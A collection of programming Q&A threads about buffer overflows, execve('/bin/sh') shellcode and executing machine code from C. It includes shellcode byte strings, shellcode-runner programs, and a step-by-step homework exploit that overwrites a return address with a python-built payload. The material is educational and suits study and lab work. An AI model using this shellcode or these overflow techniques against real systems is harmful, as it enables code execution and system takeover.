Buffer overflow, not expected result - c

Hi, I am learning about buffer overflows. To understand them better I wrote a small program to see what happens, but I could not find anything wrong.
char shellcode[] =
"\xeb\x2a\x5e\x89\x76\x08\xc6\x46\x07\x00\xc7\x46\x0c\x00\x00\x00"
"\x00\xb8\x0b\x00\x00\x00\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80"
"\xb8\x01\x00\x00\x00\xbb\x00\x00\x00\x00\xcd\x80\xe8\xd1\xff\xff"
"\xff\x2f\x62\x69\x6e\x2f\x73\x68\x00\x89\xec\x5d\xc3";
void main()
{
int *ret;
ret = (int *)&ret + 2;
(*ret) = (int)shellcode;
}
And the output:
[krishna]$ gcc -o testsc testsc.c
[krishna]$ ./testsc
$ exit
[krishna]$
Why does it exit? Is there any other way I can check what is happening inside my program while it executes?
What else can I try if my approach is not good enough?

Assigning a pointer isn't the same as copying a buffer. You probably meant:
memcpy(ret, shellcode, sizeof(shellcode));
However, this isn't a buffer overflow either. In this case you will attempt to write to the read-only code pages of the program, so you will get a signal or system exception of some type.
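To make the distinction between assigning a pointer and copying a buffer concrete, here is a minimal sketch. The names `payload` and `alias_sees_change_copy_does_not` are made up for illustration and the data is not the shellcode from the question: a pointer assignment only creates a second name for the same bytes, while memcpy duplicates the bytes into separate storage.

```c
#include <assert.h>
#include <string.h>

/* Hypothetical demo data, not the shellcode from the question. */
static char payload[] = "ABCD";

/* Returns 1 if a later change to `payload` is visible through the
 * pointer alias but NOT through the memcpy'd copy. */
int alias_sees_change_copy_does_not(void)
{
    char copy[sizeof(payload)];
    char *alias;

    payload[0] = 'A';                       /* reset so the demo is repeatable */
    alias = payload;                        /* pointer assignment: no bytes move */
    memcpy(copy, payload, sizeof(payload)); /* buffer copy: bytes are duplicated */
    payload[0] = 'Z';                       /* modify the original afterwards */

    assert(alias == payload);               /* same address, by construction */
    return alias[0] == 'Z' && copy[0] == 'A';
}
```

The function returns 1: the alias follows the change to the original, the copy keeps the old byte.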

I know this doesn't answer the question, but it lets you know what the shellcode does.
Your best bet would be to run the test program in a debugger or disassembler such as OllyDbg or IDA Pro and step through it instruction by instruction to see exactly what it does.
I used ConvertShellcode 2.0 which shows the shellcode as assembly and here is what it looks like
Download link to ConvertShellcode.exe http://www.mediafire.com/?rnnqjdyv0nbency
Usage.
ConvertShellcode.exe \xeb\x2a\x5e\x89\x76\x08\xc6\x46\x07\x00\xc7\x46\x0c\x00\x00\x00\x00\xb8\x0b\x00\x00\x00\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xb8\x01\x00\x00\x00\xbb\x00\x00\x00\x00\xcd\x80\xe8\xd1\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x00\x89\xec\x5d\xc3
ConvertShellcode 2.0
Copyright (C) 2009 Alain Rioux. All rights reserved.
Assembly language source code :
***************************************
00000000 jmp 0x2c
00000002 pop esi
00000003 mov dword[esi+0x8],esi
00000006 mov byte[esi+0x7],0x0
0000000a mov dword[esi+0xc],0x0
00000011 mov eax,0xb
00000016 mov ebx,esi
00000018 lea ecx,[esi+0x8]
0000001b lea edx,[esi+0xc]
0000001e int 0x80
00000020 mov eax,0x1
00000025 mov ebx,0x0
0000002a int 0x80
0000002c call 0x2
00000031 das
00000032 bound ebp,qword[ecx+0x6e]
00000035 das
00000036 jae 0xa0

You can use gdb for debugging and understanding what is happening inside.
gcc -g -o testsc testsc.c
gdb testsc
(gdb)break main
(gdb)print ret
(gdb)print *ret
and go step by step through the code.
Meanwhile you can view the disassembled code by using readelf/objdump
In another terminal,
objdump -xsd testsc
And use ConvertShellcode, as mentioned by SSpoke, to see what the shellcode looks like in assembly.
Also have a look at assembler code by using
gcc -S testsc.c

Why does it exit?
sh prints exit if input is at EOF, for example when Ctrl D has been pressed; if you didn't do that, there must be some other reason for the EOF.
Is there any other way I can check what is happening inside my program while it executes?
Since your program has already successfully executed /bin/sh, I see no point in checking inside your program with a debugger. I'd look at the output of strace testsc (that also traces the shell); near the end we should see a read call which is supposed to get command line input for sh; perhaps from the returned value and error number we can deduce the reason for the EOF, or we could see where the used file descriptor comes from.
By the way, your program compiled with gcc 2.95.3 (x86) works without sh exiting immediately.

buffer overflow?
char a[8];
strcpy(a, "0123456789");
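That two-line snippet is a real overflow: the literal "0123456789" needs 11 bytes including the terminating NUL, but a only has room for 8. For contrast, here is a minimal sketch of a bounded copy. `bounded_copy` is a hypothetical helper written for this example; it relies only on the standard snprintf, which never writes more than the given capacity.

```c
#include <assert.h>
#include <stdio.h>
#include <string.h>

/* Hypothetical helper: copy src into dst (capacity cap bytes), always
 * NUL-terminating. Returns 1 if src fit completely, 0 if it was truncated. */
int bounded_copy(char *dst, size_t cap, const char *src)
{
    assert(dst != NULL && src != NULL && cap > 0);
    /* snprintf writes at most cap bytes (including the NUL) and returns
     * the length the full string would have needed. */
    int needed = snprintf(dst, cap, "%s", src);
    return needed >= 0 && (size_t)needed < cap;
}
```

With char a[8], bounded_copy(a, sizeof a, "0123456789") stores "0123456" and reports truncation instead of writing past the end of a.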

Related

How to fix "Infinite Loop error on jumping to C code from bootloader"

I am trying to run C code to write my own operating system kernel, in order to study how operating systems work. I am stuck on an infinite loop that occurs when the bootloader jumps to my C code. How can I prevent it?
Although my bootloader works correctly, the problem appears when it jumps to the kernel code, which is written in C and built as a .COM program. The dummy code keeps printing a character again and again, although it should run only once. It seems as if the main code is being called repeatedly. Here is the code for the startpoint.asm assembly header and the bootmain.cpp file.
Here is the code for startpoint.asm, which is linked first so that it is invoked automatically (written in MASM).
Note: The code is loaded at the address 2000H:0000H.
;------------------------------------------------------------
.286 ; CPU type
;------------------------------------------------------------
.model TINY ; memory of model
;---------------------- EXTERNS -----------------------------
extrn _BootMain:near ; prototype of C func
;------------------------------------------------------------
;------------------------------------------------------------
.code
main:
jmp short start ; go to main
nop
;----------------------- CODE SEGMENT -----------------------
start:
cli
mov ax,cs ; Setup segment registers
mov ds,ax ; Make DS correct
mov es,ax ; Make ES correct
mov ss,ax ; Make SS correct
mov bp,2000h
mov sp,2000h ; Setup a stack
sti
; start the program
call _BootMain
ret
END main ; End of prog
Code for bootmain.cpp
extern "C" void BootMain()
{
__asm
{
mov ah,0EH
mov al,'G'
int 10H
}
return;
}
The compiling and linker commands are as follows:
Code to compile bootmain.cpp:
CL.EXE /AT /G2 /Gs /Gx /c /Zl bootmain.cpp
Code to compile startpoint.asm:
ML.EXE /AT /c startpoint.asm
Code to link them both (In preserved order):
LINK.EXE /T /NOD startPoint.obj bootmain.obj
Expected output:
G
Actual Output:
GGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGG
Take a closer look at the end of start.
start is never called -- it is jumped to directly, and it sets up the stack itself. When _BootMain returns, the stack is empty; the ret at the end of start will pop garbage data from above the end of the stack and attempt to jump to it. If that memory contains zeroes, program flow will return to main.
You need to set up something specific to happen after _BootMain returns. If you just want the system to hang after executing _BootMain, put an infinite loop (e.g. jmp $ in MASM syntax) at the end of start in place of the erroneous ret.
Alternatively, consider having your bootloader set up the stack itself and call the COM executable. When that returns, the bootloader can take appropriate action.

How can I exploit a buffer overflow?

I have a homework assignment to exploit a buffer overflow in the given program.
#include <stdio.h>
#include <stdlib.h>
int oopsIGotToTheBadFunction(void)
{
printf("Gotcha!\n");
exit(0);
}
int goodFunctionUserInput(void)
{
char buf[12];
gets(buf);
return(1);
}
int main(void)
{
goodFunctionUserInput();
printf("Overflow failed\n");
return(1);
}
The professor wants us to exploit the input gets(). We are not supposed to modify the code in any way, only create a malicious input that will create a buffer overflow. I've looked online but I am not sure how to go about doing this. I'm using gcc version 5.2.0 and Windows 10 version 1703. Any tips would be great!
Update:
I have looked up some tutorials and at least found the address for the hidden function I am trying to overflow into, but I am now stuck. I have been trying to run these commands:
gcc -g -o vuln -fno-stack-protector -m32 homework5.c
gdb ./vuln
disas main
break *0x00010880
run $(python -c "print('A'*256)")
x/200xb $esp
With that last command, it comes up saying "Value can't be converted to integer." I tried replacing esp to rsp because I am on a 64-bit but that came up with the same result. Is there a work around to this or another way to find the address of buf?
Since buf is an array of 12 characters, inputting anything longer than the buffer can hold should result in a buffer overflow.
First, you need to find the offset at which the input overwrites the saved return address, which is what ends up in the instruction pointer (EIP on 32-bit, RIP on 64-bit).
gdb with PEDA is very useful for this:
$ gdb ./bof
...
gdb-peda$ pattern create 100 input
Writing pattern of 100 chars to filename "input"
...
gdb-peda$ r < input
Starting program: /tmp/bof < input
...
=> 0x4005c8 <goodFunctionUserInput+26>: ret
0x4005c9 <main>: push rbp
0x4005ca <main+1>: mov rbp,rsp
0x4005cd <main+4>: call 0x4005ae <goodFunctionUserInput>
0x4005d2 <main+9>: mov edi,0x40067c
[------------------------------------stack-------------------------------------]
0000| 0x7fffffffe288 ("(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL")
0008| 0x7fffffffe290 ("A)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL")
0016| 0x7fffffffe298 ("AA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL")
0024| 0x7fffffffe2a0 ("bAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL")
0032| 0x7fffffffe2a8 ("AcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL")
0040| 0x7fffffffe2b0 ("AAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL")
0048| 0x7fffffffe2b8 ("IAAeAA4AAJAAfAA5AAKAAgAA6AAL")
0056| 0x7fffffffe2c0 ("AJAAfAA5AAKAAgAA6AAL")
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x00000000004005c8 in goodFunctionUserInput ()
gdb-peda$ patts
Registers contain pattern buffer:
R8+0 found at offset: 92
R9+0 found at offset: 56
RBP+0 found at offset: 16
Registers point to pattern buffer:
[RSP] --> offset 24 - size ~76
[RSI] --> offset 0 - size ~100
....
Now you can overwrite the saved return address (and therefore RIP on this 64-bit build): the offset is 24 bytes. Since your homework only needs to print the "Gotcha!\n" string, just jump to the oopsIGotToTheBadFunction function.
Get the function address:
$ readelf -s bof
...
50: 0000000000400596 24 FUNC GLOBAL DEFAULT 13 oopsIGotToTheBadFunction
...
Make the exploit and got the results:
[manu@debian /tmp]$ python -c 'print "A"*24+"\x96\x05\x40\x00\x00\x00\x00\x00"' > input
[manu@debian /tmp]$ ./bof < input
Gotcha!
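The same payload can be assembled in C, which makes the layout explicit: filler bytes up to the saved return address, then the target address stored least significant byte first. This is only a sketch. `build_payload` is a hypothetical helper, and the offset 24 and address 0x400596 are the values from the session above; they will differ on another compiler or build.

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

/* Hypothetical helper: fill out[] with `offset` filler bytes followed by
 * `addr` as 8 little-endian bytes. Returns the payload length, or 0 if
 * out[] (capacity cap) is too small. */
size_t build_payload(unsigned char *out, size_t cap, size_t offset, uint64_t addr)
{
    assert(out != NULL);
    if (cap < 8 || offset > cap - 8)
        return 0;
    memset(out, 'A', offset);           /* padding up to the saved return address */
    for (int i = 0; i < 8; i++)         /* least significant byte first */
        out[offset + i] = (unsigned char)(addr >> (8 * i));
    return offset + 8;
}
```

Calling build_payload(buf, sizeof buf, 24, 0x400596) and writing the resulting 32 bytes plus a newline to a file with fwrite gives an input equivalent to the one produced by the python one-liner.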

Difference between running an assembly program and running the disassembled code in shellcode.c

I am currently working on 'Pentester Academy's x86_64 Assembly Language and Shellcoding on Linux' course (www.pentesteracademy.com/course?id=7). I have one simple question that I can't quite figure out: what is the exact difference between running an assembly program that has been assembled and linked with NASM and ld vs. running the same disassembled program in the classic shellcode.c program (written below). Why use one method over the other?
As an example, when following the first method, I use the commands :
nasm -f elf64 -o execve_stack.o execve_stack.asm
ld -o execve_stack execve_stack.o
./execve_stack
When using the second method, I insert the disassembled shellcode in the shellcode.c program:
#include <stdio.h>
#include <string.h>
unsigned char code[] = \
"\x48\x31\xc0\x50\x48\x89\xe2\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x48\x89\xe7\x50\x57\x48\x89\xe6\xb0\x3b\x0f\x05";
int main(void) {
printf("Shellcode length: %d\n", (int)strlen(code));
int (*ret)() = (int(*)())code;
ret();
return 0;
}
... and use the commands:
gcc -fno-stack-protector -z execstack -o shellcode shellcode.c
./shellcode
I have analyzed both programs in GDB and found that addresses stored in certain registers differ. I have also read the answer to the following question (C code explanation), which helped me understand the way the shellcode.c program works. Having said that, I still don't fully understand the exact way in which these two methods differ.
There is no theoretical difference between the two methods. In both you end up executing a bunch of assembly instructions on the processor.
The shellcode.c program is there to just demonstrate what would happen if you run the assembly defined as an array of bytes in the unsigned char code[] variable.
Why use one method over the other?
I think you don't understand the purpose of shellcode and the reasoning behind the shellcode.c program (it shows what happens when an arbitrary sequence of bytes that you control is executed on the processor).
A shellcode is a small piece of assembly code that is used to exploit a software vulnerability. An attacker usually injects a shellcode into software by taking advantage of common programming errors such as buffer overflows and then tries to make the software execute that injected shellcode.
A good article showing a step-by-step tutorial on how to generate a shell by performing shellcode injection using buffer overflows can be found here.
Here is what a classic shellcode, \x83\xec\x48\x31\xc0\x31\xd2\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80, looks like in assembler:
sub esp, 72
xor eax, eax
xor edx, edx
push eax
push 0x68732f2f ; "hs//" (/ is doubled because you need to push 4 bytes on the stack)
push 0x6e69622f ; "nib/"
mov ebx, esp ; EBX = address of string "/bin//sh"
push eax
push ebx
mov ecx, esp
mov al, 0xb ; EAX = 11 (which is the ID of the sys_execve Linux system call)
int 0x80
In an x86 environment, this does an execve system call with the "/bin/sh" string as parameter.
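The two pushed immediates look reversed ("hs//", "nib/") because x86 is little-endian and the stack grows downward. A small sketch that reproduces the resulting memory layout may help; `pushed_string` is a hypothetical helper written for this example, not part of any shellcode toolkit.

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

/* Hypothetical helper: lay out two 32-bit immediates in memory the way two
 * consecutive x86 pushes leave them (the value pushed last ends up at the
 * lowest address, each value stored least significant byte first).
 * out must have room for 9 bytes. */
void pushed_string(uint32_t first_pushed, uint32_t second_pushed, char out[9])
{
    assert(out != NULL);
    uint32_t words[2] = { second_pushed, first_pushed }; /* lowest address first */
    for (int w = 0; w < 2; w++)
        for (int b = 0; b < 4; b++)
            out[4 * w + b] = (char)(words[w] >> (8 * b));
    out[8] = '\0'; /* in the shellcode, the earlier "push eax" (eax = 0) provides this terminator */
}
```

pushed_string(0x68732f2f, 0x6e69622f, s) leaves "/bin//sh" in s, which is the string EBX points to after mov ebx, esp.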

How to get c code to execute hex machine code?

I want a simple C method to be able to run hex bytecode on a Linux 64 bit machine. Here's the C program that I have:
char code[] = "\x48\x31\xc0";
#include <stdio.h>
int main(int argc, char **argv)
{
int (*func) ();
func = (int (*)()) code;
(int)(*func)();
printf("%s\n","DONE");
}
The code that I am trying to run ("\x48\x31\xc0") I obtained by writing this simple assembly program (it's not supposed to really do anything)
.text
.globl _start
_start:
xorq %rax, %rax
and then compiling and objdump-ing it to obtain the bytecode.
However, when I run my C program I get a segmentation fault. Any ideas?
Machine code has to be in an executable page. Your char code[] is in the read+write data section, without exec permission, so the code cannot be executed from there.
Here is a simple example of allocating an executable page with mmap:
#include <stdio.h>
#include <string.h>
#include <sys/mman.h>
int main ()
{
char code[] = {
0x8D, 0x04, 0x37, // lea eax,[rdi+rsi]
0xC3 // ret
};
int (*sum) (int, int) = NULL;
// allocate executable buffer
sum = mmap (0, sizeof(code), PROT_READ|PROT_WRITE|PROT_EXEC,
MAP_PRIVATE|MAP_ANONYMOUS, -1, 0);
// copy code to buffer
memcpy (sum, code, sizeof(code));
// doesn't actually flush cache on x86, but ensure memcpy isn't
// optimized away as a dead store.
// The range is in bytes, so use char* and the size of the code, not sizeof(sum).
__builtin___clear_cache ((char*)sum, (char*)sum + sizeof(code)); // GNU C
// run code
int a = 2;
int b = 3;
int c = sum (a, b);
printf ("%d + %d = %d\n", a, b, c);
}
See another answer on this question for details about __builtin___clear_cache.
Until recent Linux kernel versions (sometime before 5.4), you could simply compile with gcc -z execstack - that would make all pages executable, including read-only data (.rodata), and read-write data (.data) where char code[] = "..." goes.
Now -z execstack only applies to the actual stack, so it currently works only for non-const local arrays. i.e. move char code[] = ... into main.
See Linux default behavior against `.data` section for the kernel change, and Unexpected exec permission from mmap when assembly files included in the project for the old behaviour: enabling Linux's READ_IMPLIES_EXEC process for that program. (In Linux 5.4, that Q&A shows you'd only get READ_IMPLIES_EXEC for a missing PT_GNU_STACK, like a really old binary; modern GCC -z execstack would set PT_GNU_STACK = RWX metadata in the executable, which Linux 5.4 would handle as making only the stack itself executable. At some point before that, PT_GNU_STACK = RWX did result in READ_IMPLIES_EXEC.)
The other option is to make system calls at runtime to copy into an executable page, or change permissions on the page it's in. That's still more complicated than using a local array to get GCC to copy code into executable stack memory.
(I don't know if there's an easy way to enable READ_IMPLIES_EXEC under modern kernels. Having no GNU-stack attribute at all in an ELF binary does that for 32-bit code, but not 64-bit.)
Yet another option is __attribute__((section(".text"))) const char code[] = ...;
Working example: https://godbolt.org/z/draGeh.
If you need the array to be writeable, e.g. for shellcode that inserts some zeros into strings, you could maybe link with ld -N. But probably best to use -z execstack and a local array.
Two problems in the question:
exec permission on the page, because you used an array that will go in the noexec read+write .data section.
your machine code doesn't end with a ret instruction so even if it did run, execution would fall into whatever was next in memory instead of returning.
And BTW, the REX prefix is totally redundant. "\x31\xc0" xor eax,eax has exactly the same effect as xor rax,rax.
You need the page containing the machine code to have execute permission. x86-64 page tables have a separate bit for execute separate from read permission, unlike legacy 386 page tables.
The easiest way to get static arrays to be in read+exec memory was to compile with gcc -z execstack. (Used to make the stack and other sections executable, now only the stack).
Until recently (2018 or 2019), the standard toolchain (binutils ld) would put section .rodata into the same ELF segment as .text, so they'd both have read+exec permission. Thus using const char code[] = "..."; was sufficient for executing manually-specified bytes as data, without execstack.
But on my Arch Linux system with GNU ld (GNU Binutils) 2.31.1, that's no longer the case. readelf -a shows that the .rodata section went into an ELF segment with .eh_frame_hdr and .eh_frame, and it only has Read permission. .text goes in a segment with Read + Exec, and .data goes in a segment with Read + Write (along with the .got and .got.plt). (What's the difference of section and segment in ELF file format)
I assume this change is to make ROP and Spectre attacks harder by not having read-only data in executable pages where sequences of useful bytes could be used as "gadgets" that end with the bytes for a ret or jmp reg instruction.
// TODO: use char code[] = {...} inside main, with -z execstack, for current Linux
// Broken on recent Linux, used to work without execstack.
#include <stdio.h>
// can be non-const if you use gcc -z execstack. static is also optional
static const char code[] = {
0x8D, 0x04, 0x37, // lea eax,[rdi+rsi] // retval = a+b;
0xC3 // ret
};
static const char ret0_code[] = "\x31\xc0\xc3"; // xor eax,eax ; ret
// the compiler will append a 0 byte to terminate the C string,
// but that's fine. It's after the ret.
int main () {
// void* cast is easier to type than a cast to function pointer,
// and in C can be assigned to any other pointer type. (not C++)
int (*sum) (int, int) = (void*)code;
int (*ret0)(void) = (void*)ret0_code;
// run code
int c = sum (2, 3);
return ret0();
}
On older Linux systems: gcc -O3 shellcode.c && ./a.out (Works because of const on global/static arrays)
On Linux before 5.5 (or so) gcc -O3 -z execstack shellcode.c && ./a.out (works because of -zexecstack regardless of where your machine code is stored). Fun fact: gcc allows -zexecstack with no space, but clang only accepts clang -z execstack.
These also work on Windows, where read-only data goes in .rdata instead of .rodata.
The compiler-generated main looks like this (from objdump -drwC -Mintel). You can run it inside gdb and set breakpoints on code and ret0_code
(I actually used gcc -no-pie -O3 -zexecstack shellcode.c, hence the addresses near 401000.)
0000000000401020 <main>:
401020: 48 83 ec 08 sub rsp,0x8 # stack aligned by 16 before a call
401024: be 03 00 00 00 mov esi,0x3
401029: bf 02 00 00 00 mov edi,0x2 # 2 args
40102e: e8 d5 0f 00 00 call 402008 <code> # note the target address in the next page
401033: 48 83 c4 08 add rsp,0x8
401037: e9 c8 0f 00 00 jmp 402004 <ret0_code> # optimized tailcall
Or use system calls to modify page permissions
Instead of compiling with gcc -zexecstack, you can instead use mmap(PROT_EXEC) to allocate new executable pages, or mprotect(PROT_EXEC) to change existing pages to executable. (Including pages holding static data.) You also typically want at least PROT_READ and sometimes PROT_WRITE, of course.
Using mprotect on a static array means you're still executing the code from a known location, maybe making it easier to set a breakpoint on it.
On Windows you can use VirtualAlloc or VirtualProtect.
Telling the compiler that data is executed as code
Normally compilers like GCC assume that data and code are separate. This is like type-based strict aliasing, but even using char* doesn't make it well-defined to store into a buffer and then call that buffer as a function pointer.
In GNU C, you also need to use __builtin___clear_cache(buf, buf + len) after writing machine code bytes to a buffer, because the optimizer doesn't treat dereferencing a function pointer as reading bytes from that address. Dead-store elimination can remove the stores of machine code bytes into a buffer, if the compiler proves that the store isn't read as data by anything. https://codegolf.stackexchange.com/questions/160100/the-repetitive-byte-counter/160236#160236 and https://godbolt.org/g/pGXn3B has an example where gcc really does do this optimization, because gcc "knows about" malloc.
(And on non-x86 architectures where I-cache isn't coherent with D-cache, it actually will do any necessary cache syncing. On x86 it's purely a compile-time optimization blocker and doesn't expand to any instructions itself.)
Re: the weird name with three underscores: It's the usual __builtin_name pattern, but name is __clear_cache.
My edit on @AntoineMathys's answer added this.
In practice GCC/clang don't "know about" mmap(MAP_ANONYMOUS) the way they know about malloc. So in practice the optimizer will assume that the memcpy into the buffer might be read as data by the non-inline function call through the function pointer, even without __builtin___clear_cache(). (Unless you declared the function type as __attribute__((const)).)
On x86, where I-cache is coherent with data caches, having the stores happen in asm before the call is sufficient for correctness. On other ISAs, __builtin___clear_cache() will actually emit special instructions as well as ensuring the right compile-time ordering.
It's good practice to include it when copying code into a buffer because it doesn't cost performance, and stops hypothetical future compilers from breaking your code. (e.g. if they do understand that mmap(MAP_ANONYMOUS) gives newly-allocated anonymous memory that nothing else has a pointer to, just like malloc.)
With current GCC, I was able to provoke GCC into really doing an optimization we don't want by using __attribute__((const)) to tell the optimizer sum() is a pure function (that only reads its args, not global memory). GCC then knows sum() can't read the result of the memcpy as data.
With another memcpy into the same buffer after the call, GCC does dead-store elimination into just the 2nd store after the call. This results in no store before the first call so it executes the 00 00 add [rax], al bytes, segfaulting.
// demo of a problem on x86 when not using __builtin___clear_cache
#include <stdio.h>
#include <string.h>
#include <sys/mman.h>
int main ()
{
char code[] = {
0x8D, 0x04, 0x37, // lea eax,[rdi+rsi]
0xC3 // ret
};
__attribute__((const)) int (*sum) (int, int) = NULL;
// copy code to executable buffer
sum = mmap (0,sizeof(code),PROT_READ|PROT_WRITE|PROT_EXEC,
MAP_PRIVATE|MAP_ANON,-1,0);
memcpy (sum, code, sizeof(code));
//__builtin___clear_cache(sum, sum + sizeof(code));
int c = sum (2, 3);
//printf ("%d + %d = %d\n", a, b, c);
memcpy(sum, (char[]){0x31, 0xc0, 0xc3, 0}, 4); // xor-zero eax, ret, padding for a dword store
//__builtin___clear_cache(sum, sum + 4);
return sum(2,3);
}
Compiled on the Godbolt compiler explorer with GCC9.2 -O3
main:
push rbx
xor r9d, r9d
mov r8d, -1
mov ecx, 34
mov edx, 7
mov esi, 4
xor edi, edi
sub rsp, 16
call mmap
mov esi, 3
mov edi, 2
mov rbx, rax
call rax # call before store
mov DWORD PTR [rbx], 12828721 # 0xC3C031 = xor-zero eax, ret
add rsp, 16
pop rbx
ret # no 2nd call, CSEd away because const and same args
Passing different args would have gotten another call reg, but even with __builtin___clear_cache the two sum(2,3) calls can CSE. __attribute__((const)) doesn't respect changes to the machine code of a function. Don't do it. It's safe if you're going to JIT the function once and then call many times, though.
Uncommenting the first __clear_cache results in
mov DWORD PTR [rax], -1019804531 # lea; ret
call rax
mov DWORD PTR [rbx], 12828721 # xor-zero; ret
... still CSE and use the RAX return value
The first store is there because of __clear_cache and the sum(2,3) call. (Removing the first sum(2,3) call does let dead-store elimination happen across the __clear_cache.)
The second store is there because the side-effect on the buffer returned by mmap is assumed to be important, and that's the final value main leaves.
Godbolt's ./a.out option to run the program still seems to always fail (exit status of 255); maybe it sandboxes JITing? It works on my desktop with __clear_cache and crashes without.
mprotect on a page holding existing C variables.
You can also give a single existing page read+write+exec permission. This is an alternative to compiling with -z execstack
You don't need __clear_cache on a page holding read-only C variables because there's no store to optimize away. You would still need it for initializing a local buffer (on the stack). Otherwise GCC will optimize away the initializer for this private buffer that a non-inline function call definitely doesn't have a pointer to. (Escape analysis). It doesn't consider the possibility that the buffer might hold the machine code for the function unless you tell it that via __builtin___clear_cache.
#include <stdio.h>
#include <sys/mman.h>
#include <stdint.h>
// can be non-const if you want, we're using mprotect
static const char code[] = {
0x8D, 0x04, 0x37, // lea eax,[rdi+rsi] // retval = a+b;
0xC3 // ret
};
static const char ret0_code[] = "\x31\xc0\xc3";
int main () {
// void* cast is easier to type than a cast to function pointer,
// and in C can be assigned to any other pointer type. (not C++)
int (*sum) (int, int) = (void*)code;
int (*ret0)(void) = (void*)ret0_code;
// hard-coding x86's 4k page size for simplicity.
// also assume that `code` doesn't span a page boundary and that ret0_code is in the same page.
uintptr_t page = (uintptr_t)code & -4096ULL; // round down to a 4k boundary (clears the low 12 bits)
mprotect((void*)page, 4096, PROT_READ|PROT_EXEC|PROT_WRITE); // +write in case the page holds any writeable C vars that would crash later code.
// run code
int c = sum (2, 3);
return ret0();
}
I used PROT_READ|PROT_EXEC|PROT_WRITE in this example so it works regardless of where your variable is. If it was a local on the stack and you left out PROT_WRITE, call would fail after making the stack read only when it tried to push a return address.
Also, PROT_WRITE lets you test shellcode that self-modifies, e.g. to edit zeros into its own machine code, or other bytes it was avoiding.
$ gcc -O3 shellcode.c # without -z execstack
$ ./a.out
$ echo $?
0
$ strace ./a.out
...
mprotect(0x55605aa3f000, 4096, PROT_READ|PROT_WRITE|PROT_EXEC) = 0
exit_group(0) = ?
+++ exited with 0 +++
If I comment out the mprotect, it does segfault with recent versions of GNU Binutils ld which no longer put read-only constant data into the same ELF segment as the .text section.
If I did something like ret0_code[2] = 0xc3;, I would need __builtin___clear_cache(ret0_code+2, ret0_code+3) after that to make sure the store wasn't optimized away, but if I don't modify the static arrays then it's not needed after mprotect. It is needed after mmap+memcpy or manual stores, because we want to execute bytes that have been written in C (with memcpy).
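Rounding an address down to the start of its page means clearing all of its low bits, i.e. ANDing with ~(page_size - 1), which for a 4096-byte page is the same mask as -4096. A minimal sketch of that step follows; `page_floor` and `page_floor_runtime` are hypothetical helper names, and the second one asks the OS for the page size through POSIX sysconf instead of hard-coding 4k.

```c
#include <assert.h>
#include <stdint.h>
#include <unistd.h>

/* Hypothetical helper: round addr down to the start of its page.
 * page_size must be a power of two (4096 on typical x86-64 Linux). */
uintptr_t page_floor(uintptr_t addr, uintptr_t page_size)
{
    assert(page_size != 0 && (page_size & (page_size - 1)) == 0);
    return addr & ~(page_size - 1);
}

/* Same, but queries the page size at run time instead of hard-coding it. */
uintptr_t page_floor_runtime(const void *p)
{
    long sz = sysconf(_SC_PAGESIZE);    /* POSIX */
    assert(sz > 0);
    return page_floor((uintptr_t)p, (uintptr_t)sz);
}
```

The result of page_floor_runtime(code) can be passed as the first argument to mprotect, with the page size as the length, under the same assumption as above that the array does not cross a page boundary.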
You need to include the assembly in-line via a special compiler directive so that it'll properly end up in a code segment. See this guide, for example: http://www.ibiblio.org/gferg/ldp/GCC-Inline-Assembly-HOWTO.html
Your machine code may be all right, but your CPU objects.
Modern CPUs manage memory in segments. In normal operation, the operating system loads a new program into a program-text segment and sets up a stack in a data segment. The operating system tells the CPU never to run code in a data segment. Your code is in code[], in a data segment. Thus the segfault.
This will take some effort.
Your code variable is stored in the .data section of your executable:
$ readelf -p .data exploit
String dump of section '.data':
[ 10] H1À
H1À is the value of your variable.
The .data section is not executable:
$ readelf -S exploit
There are 30 section headers, starting at offset 0x1150:
Section Headers:
[Nr] Name Type Address Offset
Size EntSize Flags Link Info Align
[...]
[24] .data PROGBITS 0000000000601010 00001010
0000000000000014 0000000000000000 WA 0 0 8
All 64-bit processors I'm familiar with support non-executable pages natively in the pagetables. Most newer 32-bit processors (the ones that support PAE) provide enough extra space in their pagetables for the operating system to emulate hardware non-executable pages. You'll need to run either an ancient OS or an ancient processor to get a .data section marked executable.
Because these are just flags in the executable, you ought to be able to set the X flag through some other mechanism, but I don't know how to do so. And your OS might not even let you have pages that are both writable and executable.
You may need to set the page executable before you may call it.
On MS-Windows, see the VirtualProtect function.
URL: http://msdn.microsoft.com/en-us/library/windows/desktop/aa366898%28v=vs.85%29.aspx
Sorry, I couldn't follow above examples which are complicated.
So, I created an elegant solution for executing hex code from C.
Basically, you could use asm and .word keywords to place your instructions in hex format.
See below example:
asm volatile(".rept 1024\n"
CNOP
".endr\n");
where CNOP is defined as below:
#define CNOP ".word 0x00010001 \n"
Basically, c.nop instruction was not supported by my current assembler. So, I defined CNOP as the hex equivalent of c.nop with proper syntax and used inside asm, with which I was aware of.
.rept <NUM> .endr will basically, repeat the instruction NUM times.
This solution is working and verified.

Execution of function pointer to Shellcode

I'm trying to execute this simple opcode for exit(0) call by overwriting the return address of main.
The problem is I'm getting segmentation fault.
#include <stdio.h>
char shellcode[]= "/0xbb/0x14/0x00/0x00/0x00"
"/0xb8/0x01/0x00/0x00/0x00"
"/0xcd/0x80";
void main()
{
int *ret;
ret = (int *)&ret + 2; // +2 to get to the return address on the stack
(*ret) = (int)shellcode;
}
Execution result in Segmentation error.
